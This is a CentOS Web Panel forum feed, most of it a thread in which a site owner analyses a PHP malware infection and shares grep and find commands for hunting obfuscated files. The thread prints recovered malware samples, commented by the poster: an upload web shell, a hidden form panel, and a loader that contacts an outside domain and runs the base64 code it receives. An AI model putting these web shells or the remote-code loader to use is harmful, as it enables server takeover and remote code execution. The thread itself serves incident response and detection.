Recent Posts

11

CSF Firewall / Re: Firewall off in cwp panel

« Last post by overseer on October 14, 2025, 03:49:34 PM »

Try toggling it on/off/on in the web GUI -- sometimes it gets out of sync with the actual CSF reality (a bug).

12

CSF Firewall / Firewall off in cwp panel

« Last post by setecabanas on October 14, 2025, 03:07:58 PM »

firewall appears disabled in cwp panel

but csf is working correctly

[root@s3 services]# csf -e
csf and lfd are not disabled!

[root@s3 services]# csf -e
csf and lfd are not disabled!


any idea?

13

DKIM / Re: I'm a bit lost

« Last post by pedromidiasf on October 14, 2025, 12:48:10 PM »

I'm sorry I lost this message.
Thank you for your time and help.

14

Information / Re: htpasswd on CWP

« Last post by pedromidiasf on October 14, 2025, 10:02:46 AM »

The FYI for those interested is that cwpsrv runs under Nginx, not Apache -- so syntax for configuration changes needs to be appropriate for Nginx. And thus, .htaccess files are not read or considered.

Also, in order to preserve files through CWP updates, you need to set the immutable bit:

Code: [Select]

chattr +i /usr/local/cwpsrv/htdocs/.htpasswd

Yes I fould out. I wasn't familier with Nginx, that's why it wasn't working what I was doing.
Thanks for the immutable bit! This will help!

15

CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

« Last post by pedromidiasf on October 14, 2025, 09:55:52 AM »

To find files that have base64 encoded parts (used to obfuscate php code):
grep -RIl --binary-files=text -P '[A-Za-z0-9+/]{100,}={0,2}' /home

Some false positives might end up being: pdf, mp3, image, and so on (you have to take a deep look into it)

--
Alternative:

If you want to filter just php files (not enough to be secure):
grep -RIl --binary-files=text --include="*.php" -P '[A-Za-z0-9+/]{100,}={0,2}' /home

If you want to filter just files without extension (still not enough to be secure):
grep -RIl --binary-files=text --exclude='*.*' -P '[A-Za-z0-9+/]{100,}={0,2}' /home

--
Note: You could extend this outside /home. But as far I'm concern, this hack didn't directly affect the system otherwise you would be seeing cron jobs and other stuff around the system. But I recommend you to change all usernames passwords.

16

CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

« Last post by pedromidiasf on October 13, 2025, 10:24:05 PM »

There are a lot of index.php files exploited. Some are close to "c" file, others are just disposed across directories.
Use this to find them:
grep -Rl --include="*index.php" 'ucwords' /home/px_disabled/public_html/


To find zipped files that have no zip extension (ignoring Microsoft Office documents):
find /home -type f ! -name '*.zip' ! -name '*.docx' ! -name '*.xlsx' ! -name '*.pptx' -exec sh -c 'head -c2 "$1" | read -r b && [ "$b" = "PK" ] && echo "$1"' _ {} \;

17

CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

« Last post by pedromidiasf on October 13, 2025, 08:55:01 PM »

Also found out that all the files you get distributed by the server are obfuscated differently. By this you won't be able to search for specific text. Maybe specific functions but even the functions like "goto", "ucwords" and $GLOBALS that is not commonly used but it is used a lot on these exploits.

$GLOBALS array is used to add a function (built with a string??) to the system that is afterwards executed. This allows the attacker to execute php code without using the "eval" function (I'm not sure about this part). This therm is used on all files that i saw, it might be very useful to find those exploits using this term.


Another idea:
Also search for files that start with "PK" (zipped content) and don't have the zip extension.

18

CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

« Last post by pedromidiasf on October 13, 2025, 07:17:20 PM »

wp-login.php
It receives an URL GET parameter (?MeL=...) that is related to that "licelic.c" code inside (all URLs there have this MeL parameter). It also saves files.

(DO NOT EXECUTE THIS!)

Code: [Select]

<?php 
// WARNING: MALICIOUS CODE - DO NOT EXECUTE

// Initialize variables
$aLTZ_CWiB = false;

// Decode &#39;serialize&#39; function from concatenated string indices
// This reconstructs: s-e-r-i-a-l-i-z-e
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].
("vgIrrw")[3])("dseBk", "GjGg9m");

$b4YsfJ = array("o0FgLZyK4ABbJHto");
$JHwES = (string) null;

// Decode &#39;wordwrap&#39; function and set word wrap to 15 characters
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].
("wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])("", 15);

// Get current date and time
$EKsO2FVW = date("Y-m-d H:i:s");

// Decode &#39;md5&#39; function
$MAsW_z = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
("nntWNs")[2].("vgIrrw")[3])("MAsW_z", "cGXdJI");

// Decode &#39;trim&#39; function
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");

// Check if GET parameter "MeL" exists - if not, exit
if(!isset($_GET["MeL"])) exit;

// Check if constant is defined
$LHpbN4P2x = defined("_NYaHD");

// Get POST parameter "RfDJgIyWki" (trim it if exists)
$NiXTY2V3mC = isset($_POST["RfDJgIyWki"])?
(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["RfDJgIyWki"]):"";

$_blZ7fx = metaphone("moSCud");
$Jt69Gsohg = define("OL0mQ","gDrORyX");
$BMbxgE4 = false;

// Get POST parameter "xYjdx" (trim it if exists)
$V9Aqud = isset($_POST["xYjdx"])?
(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["xYjdx"]):"";

// If $V9Aqud is not empty, call save_file() function and exit
// This SAVES UPLOADED FILE to the server
$sf = !empty($V9Aqud)?exit("hHc1Pq7UymG5xrZgRn_".save_file($NiXTY2V3mC,$V9Aqud)):"";

// Decode another function
$dPE1i_ = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
("nntWNs")[2].("vgIrrw")[3])("zOEPQxj","ssMKu");

// CRITICAL FUNCTION: Saves uploaded file to disk
// Parameters: $NiXTY2V3mC = filename, $V9Aqud = file content
function save_file($NiXTY2V3mC,$V9Aqud){
    // Open file in write mode
    $handle = fopen($NiXTY2V3mC,"w");
    if($handle){
        // Write the malicious content to the file
        fwrite($handle,$V9Aqud);
        fclose($handle);
    }
    return "hHc1Pq7UymG5xrZgRn_";
}

$yXQwOmu = addslashes("yXQwOmu");

// Display HTML form (reconstructed from character indices)
// This renders an HTML form with input fields
echo ("<z01")[0].("em8fuW")[3].(... [reconstructs HTML form HTML] ...);
?>

19

CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

« Last post by pedromidiasf on October 13, 2025, 06:58:20 PM »

backup.c
Zip file (change the extension to zip and open it with a zip application). It contains a new file called "back".
This file talks to the exterior. I asked cloud.ai to comment the code:
(DO NOT EXECUTE)

Code: [Select]

<?php
// MALICIOUS CODE - DO NOT EXECUTE

// Helper function that executes a function dynamically
// Used to obfuscate function calls
function sdcss($strrt,$pram_1){
return $strrt($pram_1);
}

// Main malicious function that fetches and executes remote code
// Parameters: $url = remote server URL, $time_out = connection timeout
function KmY7I3NC($url,$time_out=30){
// Check if cURL is available (preferred method)
if(sdcss("function_exists","curl_exec")){
// Initialize cURL connection
$fq8h2HYxV=curl_init();

// Set the target URL (10002 = CURLOPT_URL)
curl_setopt($fq8h2HYxV,10002,$url);

// Return transfer as string (19913 = CURLOPT_RETURNTRANSFER)
curl_setopt($fq8h2HYxV,19913,1);

// Do not verify SSL certificate (64 = CURLOPT_SSL_VERIFYPEER)
curl_setopt($fq8h2HYxV,64,false);

// Set random timeout between 30-60 seconds (13 = CURLOPT_TIMEOUT)
curl_setopt($fq8h2HYxV,13,mt_rand(30,60));

// Execute the request, decode the response (skip first character)
// and execute it as PHP code using eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(curl_exec($fq8h2HYxV)),1)));

// Close cURL connection
curl_close($fq8h2HYxV);
}else{
// Fallback: use file_get_contents if cURL is not available
// Also decodes base64 and executes with eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(sdcss("file_get_contents",$url),1))));
}

// Return the result of executed code
return $fhD2dN4z;
}

// Main malware trigger - checks if GET parameter "l" is set
if(isset($_GET["l"])){
    // Collect all GET parameters (with empty string as default if not set)
    $tid = isset($_GET["tid"])?$_GET["tid"]:"";
    $did = isset($_GET["did"])?$_GET["did"]:"";
    $tem = isset($_GET["tem"])?$_GET["tem"]:"";
$ck = isset($_GET["ck"])?$_GET["ck"]:"";
$usip = isset($_GET["usip"])?$_GET["usip"]:"";
$vson = isset($_GET["vson"])?$_GET["vson"]:"";
$no = isset($_GET["no"])?$_GET["no"]:"";
    
    // Build malicious URL with encoded server address
    // URL decodes to: "http://vOlOVmARTc.Ru/dai/?c=base&l=...&ck=...&usip=...&vson=...&no=...&tid=...&did=...&tem=..."
    $url = "\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d".$_GET["l"]."&ck=".$ck."&usip=".$usip."&vson=".$vson."&no=".$no."&tid=".$tid."&did=".$did."&tem=".$tem;
    
    // Fetch remote PHP code, decode it, and execute it
    $str = KmY7I3NC($url);
}

?>
Russian URLs (I've also detected some Russian emails on my Wordpress accounts.
But it looks like the domain is off. Probably banned?

20

CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

« Last post by pedromidiasf on October 13, 2025, 06:54:00 PM »

I found some .c files.
I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.

Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)

Code: [Select]

<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;

// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
    $iGRCOPT = str_split($TYCMzwTO, 1);
    $emivt51O = explode(",", $x6Mpbe);
    $gMRtx3VD = "";
    foreach($emivt51O as $v) {
        $gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return $gMRtx3VD;
}

// Static class with method to initialize arrays
class hCXKOZB {
    public static function __callStatic($name, $arguments) {
        $temarr = array(
            "puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
            "CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
            "mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
        );
        foreach($temarr as $key => $v) {
            $GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";

// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));

// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>
index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).

These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).